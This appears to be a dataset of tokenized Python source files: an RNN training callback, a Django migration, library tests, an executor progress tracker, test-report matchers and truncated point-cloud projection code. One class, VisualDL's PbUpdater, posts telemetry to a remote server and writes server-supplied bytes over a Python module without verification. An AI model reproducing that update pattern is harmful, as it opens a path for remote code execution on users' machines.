content
stringlengths
0
1.55M
"Regroups lr adjustment to seq_len, AR and TAR"<import_from_stmt>..torch_core *<import_from_stmt>..callback *<import_from_stmt>..basic_train Learner<line_sep>__all__=['RNNTrainer']<line_sep>@dataclass<class_stmt>RNNTrainer(Callback)<block_start>"`Callback` that regroups lr adjustment to seq_len, AR and TAR"<line_sep>learn:Learner<line_sep>bptt:int<line_sep>alpha:float=0.<line_sep>beta:float=0.<line_sep>adjust:bool=<true><def_stmt>on_loss_begin self last_output:Tuple[Tensor Tensor Tensor] **kwargs#Save the extra outputs for later and only returns the true output. <block_start>self.raw_out,self.out=last_output[1] last_output[2]<line_sep><return>last_output[0]<block_end><def_stmt>on_backward_begin self last_loss:Rank0Tensor last_input:Tensor last_output:Tensor **kwargs#Adjusts the lr to the bptt selected <block_start><if_stmt>self.adjust<block_start>self.learn.opt.lr<augmul>last_input.size(0)/self.bptt<block_end>#AR and TAR <if_stmt>self.alpha<ne>0.<block_start>last_loss<augadd>(self.alpha<times>self.out[-1].pow(2).mean()).sum()<block_end><if_stmt>self.beta<ne>0.<block_start>h=self.raw_out[-1]<if_stmt>len(h)<g>1<block_start>last_loss<augadd>(self.beta<times>(h[1:]-h[:-1]).pow(2).mean()).sum()<block_end><block_end><return>last_loss<block_end><block_end>
# Generated by Django 3.2.4 on 2021-09-10 19:11 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("bookwyrm" "0092_sitesettings_instance_short_description") ]<line_sep>operations=[migrations.AlterField(model_name="sitesettings" name="instance_short_description" field=models.CharField(blank=<true> max_length=255 null=<true>) ) ]<block_end>
# Copyright (c) 2020 VisualDL Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ======================================================================= <import_stmt>threading<import_stmt>hashlib<import_stmt>requests<import_from_stmt>visualdl __version__<import_from_stmt>visualdl.proto.record_pb2 DESCRIPTOR<def_stmt>md5 text<block_start><if_stmt>isinstance(text str)<block_start>text=text.encode("utf8")<block_end>md5=hashlib.md5()<line_sep>md5.update(text)<line_sep><return>md5.hexdigest()<block_end><class_stmt>PbUpdater(threading.Thread)<block_start><def_stmt>__init__ self product='normal'<block_start>self.product=product<line_sep>threading.Thread.__init__(self)<block_end><def_stmt>update_pb self version=__version__ md5_code=md5(str(DESCRIPTOR))<block_start>payload={"data":{"version":version "md5":md5_code "product":self.product}}<line_sep>url='https://paddlepaddle.org.cn/paddlehub/stat?from=vdl'<try_stmt><block_start>r=requests.post(url=url json=payload)<if_stmt>r.json().get("update_flag" 0)<eq>1<block_start>pb_bin=r.json().get("pb_bin")<with_stmt>open('/visualdl/proto/record_pb2.py' mode='wb')<as>fp<block_start>fp.write(pb_bin)<line_sep>print('Update pb file successfully.')<block_end><block_end><block_end><except_stmt>Exception<block_start><pass><block_end><block_end><def_stmt>run self<block_start>self.update_pb(version=__version__ md5_code=md5(str(DESCRIPTOR)))<block_end><block_end>
<import_stmt>pytest<import_from_stmt>ics Calendar ContentLine<def_stmt>test_gh195_override_prodid <block_start>lines=["BEGIN:VCALENDAR" "VERSION:2.0" "X-WR-CALNAME:<NAME>" "X-APPLE-CALENDAR-COLOR:#996633" "END:VCALENDAR"]<with_stmt>pytest.raises(ValueError match="attribute PRODID is required but got no value")<block_start>Calendar(lines)<block_end>calendar=Calendar()<assert_stmt>calendar.prodid<eq>Calendar.DEFAULT_PRODID<assert_stmt>ContentLine("PRODID" value=Calendar.DEFAULT_PRODID)<in>calendar.to_container()<line_sep>test_prodid="TEST_PRODID 123456 GitHub Issue 195"<line_sep>lines.insert(1 "PRODID:"+test_prodid)<line_sep>calendar=Calendar(lines)<assert_stmt>calendar.prodid<eq>test_prodid<assert_stmt>ContentLine("PRODID" value=test_prodid)<in>calendar.to_container()<block_end>
<import_from_stmt>typing List Any Text<import_stmt>pytest<import_from_stmt>rasa.core.actions.loops LoopAction<import_from_stmt>rasa.core.channels CollectingOutputChannel<import_from_stmt>rasa.shared.core.domain Domain<import_from_stmt>rasa.shared.core.events Event ActionExecutionRejected ActionExecuted ActiveLoop SlotSet <import_from_stmt>rasa.core.nlg TemplatedNaturalLanguageGenerator<import_from_stmt>rasa.shared.core.trackers DialogueStateTracker<async_keyword><def_stmt>test_whole_loop <block_start>expected_activation_events=[ActionExecutionRejected("tada") ActionExecuted("test") ]<line_sep>expected_do_events=[ActionExecuted("do")]<line_sep>expected_deactivation_events=[SlotSet("deactivated")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><return>expected_activation_events<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start>events_so_far=args[-1]<assert_stmt>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events]<line_sep><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start>events_so_far=args[-1]<assert_stmt>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ActiveLoop(<none>) ]<line_sep><return>expected_deactivation_events<block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start>events_so_far=args[-1]<line_sep><return>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ]<block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[ActiveLoop(form_name) 
*expected_activation_events *expected_do_events ActiveLoop(<none>) *expected_deactivation_events ]<block_end><async_keyword><def_stmt>test_loop_without_deactivate <block_start>expected_activation_events=[ActionExecutionRejected("tada") ActionExecuted("test") ]<line_sep>expected_do_events=[ActionExecuted("do")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><return>expected_activation_events<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start><raise>ValueError("this shouldn't be called")<block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start><return><false><block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ]<block_end><async_keyword><def_stmt>test_loop_without_activate_and_without_deactivate <block_start>expected_do_events=[ActionExecuted("do")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><raise>ValueError("this shouldn't be called")<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start><return>[SlotSet("deactivated")]<block_end><async_keyword><def_stmt>is_activated self 
*args:Any<arrow>bool<block_start><return><true><block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start><return><false><block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[*expected_do_events]<block_end><async_keyword><def_stmt>test_raise_not_implemented_error <block_start>loop=LoopAction()<with_stmt>pytest.raises(NotImplementedError)<block_start><await>loop.do(<none> <none> <none> <none> [])<block_end><with_stmt>pytest.raises(NotImplementedError)<block_start><await>loop.is_done(<none> <none> <none> <none> [])<block_end><block_end>
<import_stmt>logging<import_stmt>os<import_stmt>re<import_stmt>time<import_from_stmt>threading Event Lock Thread<import_stmt>cook.util<as>cu<class_stmt>ProgressSequenceCounter<block_start>"""Utility class that supports atomically incrementing the sequence value."""<def_stmt>__init__ self initial=0<block_start>self.lock=Lock()<line_sep>self.value=initial<block_end><def_stmt>increment_and_get self<block_start>"""Atomically increments by one the current value and returns the new value."""<with_stmt>self.lock<block_start>self.value<augadd>1<line_sep><return>self.value<block_end><block_end><block_end><class_stmt>ProgressUpdater(object)<block_start>"""This class is responsible for sending progress updates to the scheduler. It throttles the rate at which progress updates are sent. """<def_stmt>__init__ self task_id max_message_length poll_interval_ms send_progress_message_fn<block_start>""" task_id: string The task id. max_message_length: int The allowed max message length after encoding. poll_interval_ms: int The interval after which to send a subsequent progress update. send_progress_message_fn: function(message) The helper function used to send the progress message. """<line_sep>self.task_id=task_id<line_sep>self.max_message_length=max_message_length<line_sep>self.poll_interval_ms=poll_interval_ms<line_sep>self.last_reported_time=<none><line_sep>self.last_progress_data_sent=<none><line_sep>self.send_progress_message=send_progress_message_fn<line_sep>self.lock=Lock()<block_end><def_stmt>has_enough_time_elapsed_since_last_update self<block_start>"""Returns true if enough time (based on poll_interval_ms) has elapsed since the last progress update (available in last_reported_time). 
"""<if_stmt>self.last_reported_time<is><none><block_start><return><true><block_end><else_stmt><block_start>current_time=time.time()<line_sep>time_diff_ms=(current_time-self.last_reported_time)<times>1000<line_sep><return>time_diff_ms<ge>self.poll_interval_ms<block_end><block_end><def_stmt>is_increasing_sequence self progress_data<block_start>"""Checks if the sequence number in progress_data is larger than the previously published progress. Parameters ---------- progress_data: dictionary The progress data to send. Returns ------- True if the sequence number in progress_data is larger than the previously published progress, False otherwise """<line_sep>last_progress_data=self.last_progress_data_sent<line_sep>last_progress_sequence=last_progress_data['progress-sequence']<if>last_progress_data<else>-1<line_sep><return>progress_data['progress-sequence']<g>last_progress_sequence<block_end><def_stmt>send_progress_update self progress_data force_send=<false><block_start>"""Sends a progress update if enough time has elapsed since the last progress update. The force_send flag can be used to ignore the check for enough time having elapsed. Using this method is thread-safe. Parameters ---------- progress_data: dictionary The progress data to send. force_send: boolean, optional Defaults to false. 
Returns ------- Nothing """<with_stmt>self.lock# ensure we do not send outdated progress data due to parallel repeated calls to this method <block_start><if_stmt>progress_data<is><none><or><not>self.is_increasing_sequence(progress_data)<block_start>logging.info('Skipping invalid/outdated progress data {}'.format(progress_data))<block_end><elif_stmt><not>force_send<and><not>self.has_enough_time_elapsed_since_last_update()<block_start>logging.debug('Not sending progress data as enough time has not elapsed since last update')<block_end><else_stmt><block_start>logging.info('Sending progress message {}'.format(progress_data))<line_sep>message_dict=dict(progress_data)<line_sep>message_dict['task-id']=self.task_id<line_sep>raw_progress_message=progress_data['progress-message']<try_stmt><block_start>progress_str=raw_progress_message.decode('ascii').strip()<block_end><except_stmt>UnicodeDecodeError<block_start>logging.info('Unable to decode progress message in ascii, using empty string instead')<line_sep>progress_str=''<block_end><if_stmt>len(progress_str)<le>self.max_message_length<block_start>message_dict['progress-message']=progress_str<block_end><else_stmt><block_start>allowed_progress_message_length=max(self.max_message_length-3 0)<line_sep>new_progress_str=progress_str[:allowed_progress_message_length].strip()+'...'<line_sep>logging.info('Progress message trimmed to {}'.format(new_progress_str))<line_sep>message_dict['progress-message']=new_progress_str<block_end>send_success=self.send_progress_message(message_dict)<if_stmt>send_success<block_start>self.last_progress_data_sent=progress_data<line_sep>self.last_reported_time=time.time()<block_end><else_stmt><block_start>logging.info('Unable to send progress message {}'.format(message_dict))<block_end><block_end><block_end><block_end><block_end><class_stmt>ProgressWatcher(object)<block_start>"""This class tails the output from the target file listening for progress messages. 
The retrieve_progress_states generates all progress messages iteratively. """<def_stmt>__init__ self output_name location_tag sequence_counter max_bytes_read_per_line progress_regex_string stop_signal task_completed_signal progress_termination_signal<block_start>"""The ProgressWatcher constructor. Parameters ---------- progress_regex_string: string The progress regex to match against, it must return one or two capture groups. The first capture group represents the progress percentage. The second capture group, if present, represents the progress message. """<line_sep>self.target_file=output_name<line_sep>self.location_tag=location_tag<line_sep>self.sequence_counter=sequence_counter<line_sep>self.max_bytes_read_per_line=max_bytes_read_per_line<line_sep>self.progress_regex_string=progress_regex_string<line_sep>self.progress_regex_pattern=re.compile(progress_regex_string.encode())<line_sep>self.progress=<none><line_sep>self.stop_signal=stop_signal<line_sep>self.task_completed_signal=task_completed_signal<line_sep>self.progress_termination_signal=progress_termination_signal<block_end><def_stmt>current_progress self<block_start>"""Returns the current progress dictionary."""<line_sep><return>self.progress<block_end><def_stmt>tail self sleep_time_ms<block_start>"""This method incrementally generates lines from a file by waiting for new content from a file. It behaves like the 'tail -f' shell command. Parameters ---------- sleep_time_ms: int The unit of time in ms to repetitively sleep when the file has not been created or no new content is available in the file being tailed. Returns ------- an incrementally generated list of lines in the file being tailed. 
"""<try_stmt><block_start>sleep_param=sleep_time_ms/1000<if_stmt>os.path.exists(self.target_file)<and><not>os.path.isfile(self.target_file)<block_start>logging.info('Skipping progress monitoring on %s as it is not a file' self.target_file)<line_sep><return><block_end><if_stmt><not>os.path.isfile(self.target_file)<block_start>logging.debug('Awaiting creation of file %s [tag=%s]' self.target_file self.location_tag)<block_end><while_stmt><not>os.path.isfile(self.target_file)<and><not>self.task_completed_signal.isSet()<block_start>time.sleep(sleep_param)<block_end><if_stmt><not>os.path.isfile(self.target_file)<block_start>logging.info('Progress output file has not been created [tag=%s]' self.location_tag)<line_sep><return><block_end><if_stmt>self.stop_signal.isSet()<block_start>logging.info('Parsing progress messages interrupted [tag=%s]' self.location_tag)<line_sep><return><block_end>logging.info('File has been created, reading contents [tag=%s]' self.location_tag)<line_sep>linesep_bytes=os.linesep.encode()<line_sep>fragment_index=0<line_sep>line_index=0<def_stmt>log_tail_summary <block_start>log_message='%s fragments and %s lines read while processing progress messages [tag=%s]'<line_sep>logging.info(log_message fragment_index line_index self.location_tag)<block_end><with_stmt>open(self.target_file 'rb')<as>target_file_obj<block_start><while_stmt><not>self.stop_signal.isSet()<block_start><if_stmt>self.progress_termination_signal.isSet()<block_start>logging.info('tail short-circuiting due to progress termination [tag=%s]' self.location_tag)<line_sep>log_tail_summary()<line_sep><break><block_end>line=target_file_obj.readline(self.max_bytes_read_per_line)<if_stmt><not>line# exit if program has completed and there are no more lines to read <block_start><if_stmt>self.task_completed_signal.isSet()<block_start>log_tail_summary()<line_sep><break><block_end># no new line available, sleep before trying again 
time.sleep(sleep_param)<line_sep><continue><block_end>fragment_index<augadd>1<if_stmt>line.endswith(linesep_bytes)<block_start>line_index<augadd>1<block_end><yield>line<block_end><if_stmt>self.stop_signal.isSet()<and><not>self.task_completed_signal.isSet()<block_start>logging.info('Task requested to be killed, may not have processed all progress messages')<block_end><block_end><block_end><except_stmt>Exception<as>exception<block_start>logging.exception('Error while tailing %s [tag=%s]' self.target_file self.location_tag)<line_sep><raise>exception<block_end><block_end><def_stmt>match_progress_update self input_data<block_start>"""Returns the progress tuple when the input string matches the provided regex. Parameters ---------- input_data: bytes The input data. Returns ------- the tuple (percent, message) if the string matches the provided regex, else return None. """<line_sep>matches=self.progress_regex_pattern.findall(input_data)<line_sep><return>matches[0]<if>len(matches)<ge>1<else><none><block_end><def_stmt>__update_progress self progress_report<block_start>"""Updates the progress field with the data from progress_report if it is valid."""<if_stmt>isinstance(progress_report tuple)<and>len(progress_report)<eq>2<block_start>percent_data,message_data=progress_report<block_end><elif_stmt>isinstance(progress_report tuple)<and>len(progress_report)<eq>1<block_start>percent_data,message_data=progress_report[0] b''<block_end><else_stmt><block_start>percent_data,message_data=progress_report b''<block_end>percent_float=float(percent_data.decode())<if_stmt>percent_float<l>0<or>percent_float<g>100<block_start>logging.info('Skipping "%s" as the percent is not in [0, 100]' progress_report)<line_sep><return><false><block_end>percent_int=int(round(percent_float))<line_sep>logging.debug('Updating progress to %s percent [tag=%s]' percent_int self.location_tag)<line_sep>self.progress={'progress-message':message_data 'progress-percent':percent_int 
'progress-sequence':self.sequence_counter.increment_and_get()}<line_sep><return><true><block_end><def_stmt>retrieve_progress_states self<block_start>"""Generates the progress states by tailing the target_file. It tails a target file (using the tail() method) and uses the provided regex to find a match for a progress message. The regex is expected to generate two components in the match: the progress percent as an int and a progress message string. When such a message is found, this method yields the current progress as a dictionary. Note: This function must rethrow any OSError exceptions that it encounters. Returns ------- An incrementally generated list of progress states. """<line_sep>last_unprocessed_report=<none><if_stmt>self.progress_regex_string<block_start>sleep_time_ms=50<for_stmt>line self.tail(sleep_time_ms)<block_start><try_stmt><block_start>progress_report=self.match_progress_update(line)<if_stmt>progress_report<is><not><none><block_start><if_stmt>self.task_completed_signal.isSet()<block_start>last_unprocessed_report=progress_report<block_end><elif_stmt>self.__update_progress(progress_report)<block_start><yield>self.progress<block_end><block_end><block_end><except_stmt>Exception<as>exception<block_start><if_stmt>cu.is_out_of_memory_error(exception)<block_start><raise>exception<block_end><else_stmt><block_start>logging.exception('Skipping "%s" as a progress entry' line)<block_end><block_end><block_end><block_end><if_stmt>last_unprocessed_report<is><not><none><block_start><if_stmt>self.__update_progress(last_unprocessed_report)<block_start><yield>self.progress<block_end><block_end><block_end><block_end><class_stmt>ProgressTracker(object)<block_start>"""Helper class to track progress messages from the specified location."""<def_stmt>__init__ self config stop_signal task_completed_signal counter progress_updater progress_termination_signal location location_tag os_error_handler<block_start>"""Launches the threads that track progress and send progress 
updates to the driver. Parameters ---------- config: cook.config.ExecutorConfig The current executor config. stop_signal: threading.Event Event that determines if an interrupt was sent task_completed_signal: threading.Event Event that tracks task execution completion progress_updater: ProgressUpdater The progress updater used to send the progress messages counter: ProgressSequenceCounter The sequence counter location: string The target location to read for progress messages location_tag: string A tag to identify the target location. os_error_handler: fn(os_error) OSError exception handler for out of memory situations."""<line_sep>self.location_tag=location_tag<line_sep>self.os_error_handler=os_error_handler<line_sep>self.progress_complete_event=Event()<line_sep>self.watcher=ProgressWatcher(location location_tag counter config.max_bytes_read_per_line config.progress_regex_string stop_signal task_completed_signal progress_termination_signal)<line_sep>self.updater=progress_updater<block_end><def_stmt>start self<block_start>"""Launches a thread that starts monitoring the progress location for progress messages."""<line_sep>logging.info('Starting progress monitoring from [tag=%s]' self.location_tag)<line_sep>tracker_thread=Thread(target=self.track_progress args=())<line_sep>tracker_thread.daemon=<true><line_sep>tracker_thread.start()<block_end><def_stmt>wait self timeout=<none><block_start>"""Waits for the progress tracker thread to run to completion."""<line_sep>self.progress_complete_event.wait(timeout=timeout)<if_stmt>self.progress_complete_event.isSet()<block_start>logging.info('Progress monitoring complete [tag=%s]' self.location_tag)<block_end><else_stmt><block_start>logging.info('Progress monitoring did not complete [tag=%s]' self.location_tag)<block_end><block_end><def_stmt>track_progress self<block_start>"""Retrieves and sends progress updates using send_progress_update_fn. 
It sets the progress_complete_event before returning."""<try_stmt><block_start><for_stmt>current_progress self.watcher.retrieve_progress_states()<block_start>self.updater.send_progress_update(current_progress)<block_end><block_end><except_stmt>Exception<as>exception<block_start><if_stmt>cu.is_out_of_memory_error(exception)<block_start>self.os_error_handler(exception)<block_end><else_stmt><block_start>logging.exception('Exception while tracking progress [tag=%s]' self.location_tag)<block_end><block_end><finally_stmt><block_start>self.progress_complete_event.set()<block_end><block_end><def_stmt>force_send_progress_update self<block_start>"""Retrieves the latest progress message and attempts to force send it to the scheduler."""<line_sep>latest_progress=self.watcher.current_progress()<line_sep>self.updater.send_progress_update(latest_progress force_send=<true>)<block_end><block_end>
""" >>> from hamcrest import assert_that >>> class Report(object): ... def __init__(self): ... self.test_cases = [ ... { ... 'fullName': 'package.module.test', ... 'id': '1' ... }, ... { ... 'fullName': 'package.module.test[param]', ... 'id': '2' ... }, ... { ... 'fullName': 'package.module.Class#test[param]', ... 'id': '3' ... } ... ] >>> assert_that(Report(), ... has_test_case('test') ... ) >>> assert_that(Report(), ... has_test_case('test[param]') ... ) >>> assert_that(Report(), ... has_test_case('Class#test[param]') ... ) >>> assert_that(Report(), ... has_test_case('wrong_test_case_name') ... ) # doctest: +ELLIPSIS Traceback (most recent call last): ... AssertionError: ... Expected: ... but: property 'test_cases' was <[{...}]> <BLANKLINE> >>> assert_that(Report(), ... has_test_case('test', ... has_entry('id', '1') ... ) ... ) >>> assert_that(Report(), ... has_test_case('Class#test[param]', ... has_entry('id', '2') ... ) ... ) # doctest: +ELLIPSIS Traceback (most recent call last): ... AssertionError: ... Expected: ... 
but: property 'test_cases' was <[{...}]> <BLANKLINE> """<import_stmt>sys<import_stmt>os<import_stmt>json<import_stmt>fnmatch<import_from_stmt>hamcrest all_of any_of<import_from_stmt>hamcrest has_property<import_from_stmt>hamcrest has_item<import_from_stmt>hamcrest has_entry<import_from_stmt>hamcrest ends_with starts_with<import_from_stmt>hamcrest only_contains<import_from_stmt>hamcrest.core.base_matcher BaseMatcher<if_stmt>sys.version_info[0]<l>3<block_start><import_from_stmt>io open<block_end><class_stmt>AllureReport(object)<block_start><def_stmt>__init__ self result<block_start>self.result_dir=result<line_sep>self.test_cases=[json.load(item)<for>item self._report_items(result '*result.json')]<line_sep>self.test_containers=[json.load(item)<for>item self._report_items(result '*container.json')]<line_sep>self.attachments=[item.read()<for>item self._report_items(result '*attachment.*')]<block_end>@staticmethod<def_stmt>_report_items report_dir glob<block_start><for_stmt>_file os.listdir(report_dir)<block_start><if_stmt>fnmatch.fnmatch(_file glob)<block_start><with_stmt>open(os.path.join(report_dir _file) encoding="utf-8")<as>report_file<block_start><yield>report_file<block_end><block_end><block_end><block_end><block_end><def_stmt>has_test_case name *matchers<block_start><return>has_property('test_cases' has_item(all_of(any_of(has_entry('fullName' ends_with(name)) has_entry('name' starts_with(name))) *matchers)))<block_end><class_stmt>HasOnlyTetcases(BaseMatcher)<block_start><def_stmt>__init__ self *matchers<block_start>self.matchers=matchers<block_end><def_stmt>_matches self item<block_start><return>has_property('test_cases' only_contains(any_of(*self.matchers))).matches(item)<block_end><def_stmt>describe_to self description<block_start><pass><block_end><block_end><def_stmt>has_only_testcases *matchers<block_start><return>HasOnlyTetcases(*matchers)<block_end><class_stmt>ContainsExactly(BaseMatcher)<block_start><def_stmt>__init__ self num 
matcher<block_start>self.matcher=matcher<line_sep>self.count=0<line_sep>self.num=num<block_end><def_stmt>_matches self item<block_start>self.count=0<for_stmt>subitem item<block_start><if_stmt>self.matcher.matches(subitem)<block_start>self.count<augadd>1<block_end><block_end><if_stmt>self.count<eq>self.num<block_start><return><true><block_end><else_stmt><block_start><return><false><block_end><block_end><def_stmt>describe_to self description<block_start>description.append_text('exactly {} item(s) matching '.format(self.num)).append_text(self.matcher)<block_end><block_end><def_stmt>has_only_n_test_cases name num *matchers<block_start><return>has_property('test_cases' ContainsExactly(num all_of(any_of(has_entry('fullName' ends_with(name)) has_entry('name' ends_with(name))) *matchers)))<block_end>
<import_stmt>numpy<as>np<import_stmt>os<import_stmt>constants<import_from_stmt>numpy.linalg inv<import_from_stmt>dataloader indoor_scenes<import_stmt>torch<import_from_stmt>collections OrderedDict Counter<import_from_stmt>tqdm tqdm<def_stmt>project_image_to_world x y depth cam2world depth_intrinsic<block_start>I=torch.zeros(4 depth.shape[0]).type(torch.cuda.FloatTensor)<line_sep>I[0 :]=x<times>depth<line_sep>I[1 :]=y<times>depth<line_sep>I[2 :]=depth<line_sep>I[3 :]=1.0<line_sep>world_coordinates=torch.mm(torch.from_numpy(cam2world).type(torch.cuda.FloatTensor) torch.mm(torch.from_numpy(inv(depth_intrinsic)).type(torch.cuda.FloatTensor) I))<del_stmt>I x y depth<line_sep>torch.cuda.empty_cache()<line_sep><return>world_coordinates<block_end><def_stmt>project_images_to_world depths cam2worlds depth_intrinsic superpixels frames<block_start>x=np.linspace(0 constants.DEPTH_WIDTH-1 constants.DEPTH_WIDTH)<line_sep>y=np.linspace(0 constants.DEPTH_HEIGHT-1 constants.DEPTH_HEIGHT)<line_sep>x_mesh,y_mesh=np.meshgrid(x y)<line_sep>world_coordinates=torch.zeros(4 len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.FloatTensor)<line_sep>frame_origins=torch.zeros(len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<line_sep>superpixel_origins=torch.zeros(len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<for_stmt>im_idx range(len(depths))<block_start>world_coordinates[: im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=project_image_to_world(torch.from_numpy(x_mesh).type(torch.cuda.FloatTensor).flatten() torch.from_numpy(y_mesh).type(torch.cuda.FloatTensor).flatten() torch.from_numpy(depths[im_idx][:]).type(torch.cuda.FloatTensor).flatten() cam2worlds[im_idx] 
depth_intrinsic)<line_sep>frame_origins[im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=torch.ones(constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<times>frames[im_idx]<line_sep>superpixel_origins[im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=torch.from_numpy(superpixels[im_idx].astype(np.int).flatten()).type(torch.cuda.IntTensor)<block_end># visualize_point_cloud(world_coordinates) <return>world_coordinates frame_origins superpixel_origins<block_end><def_stmt>project_world_to_image depth superpixel_map cam2world depth_intrinsic world_coordinates frame_origins superpixel_origins<block_start>world_coordinates_copy=world_coordinates.transpose(0 1)[: :3]<line_sep>projected_points=torch.mm(torch.mm(torch.from_numpy(depth_intrinsic).type(torch.cuda.FloatTensor) torch.from_numpy(inv(cam2world)).type(torch.cuda.FloatTensor)) world_coordinates)<line_sep>projected_points=projected_points.transpose(0 1)[: :3]<line_sep>projected_points[: 0]<augdiv>projected_points[: 2]<line_sep>projected_points[: 1]<augdiv>projected_points[: 2]<line_sep>projected_points[: 2]<augdiv>projected_points[: 2]<line_sep>selection_mask=~torch.isnan(projected_points[: 2])<line_sep>projected_points=torch.round(projected_points[selection_mask])<line_sep>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>world_coordinates_copy=world_coordinates_copy[selection_mask]<line_sep># remove out of frame bounds selection_mask=(projected_points[: 0]<ge>0)&(projected_points[: 0]<l>constants.DEPTH_WIDTH)&(projected_points[: 1]<ge>0)&(projected_points[: 1]<l>constants.DEPTH_HEIGHT)<line_sep>projected_points=projected_points[selection_mask][: 
:2]<line_sep>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>world_coordinates_copy=world_coordinates_copy[selection_mask]<line_sep>depth=torch.from_numpy(depth).type(torch.cuda.FloatTensor)<line_sep>depth=depth[projected_points[: 1].type(torch.cuda.LongTensor) projected_points[: 0].type(torch.cuda.LongTensor)].flatten()<line_sep>backprojected_points=project_image_to_world(projected_points[: 0] projected_points[: 1] depth cam2world depth_intrinsic).transpose(0 1)[: :3]<line_sep>selection_mask=(torch.norm(world_coordinates_copy-backprojected_points dim=1)<l>constants.WORLD_DISTANCE_THRESHOLD)<line_sep>projected_points=projected_points[selection_mask]<if_stmt>projected_points.shape[0]<eq>0<block_start><return><none><block_end>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>superpixel_targets=superpixel_map[projected_points[: 1].type(torch.cuda.LongTensor).cpu().numpy() projected_points[: 0].type(torch.cuda.LongTensor).cpu().numpy()].flatten()<line_sep>t1,t2=np.unique(superpixel_map return_counts=<true>)<line_sep>target_superpixel_sizes=dict(zip(t1 t2))<line_sep>frame_spx=torch.zeros((frame_origins.shape[0] 3)).type(torch.cuda.IntTensor)<line_sep>frame_spx[: 0]=torch.from_numpy(superpixel_targets.astype(np.int)).type(torch.cuda.IntTensor)<line_sep>frame_spx[: 1]=frame_origins<line_sep>frame_spx[: 2]=superpixel_origins<line_sep>uniques,counts=torch.unique(frame_spx dim=0 return_counts=<true>)<line_sep>frame_spx_counts={}<for_stmt>idx,u enumerate(uniques.tolist())<block_start>frame_spx_counts[tuple(u)]=float(counts[idx].cpu().item())<block_end>coverage_dict={}<for_stmt>i frame_spx_counts<block_start>coverage=frame_spx_counts[i]/target_superpixel_sizes[i[0]]<line_sep>coverage_dict[(i[0] i[1] i[2])]=coverage<block_end><return>coverage_dict<block_end># , projected_points <def_stmt>find_superpixel_coverage dataset_name lmdb_handle 
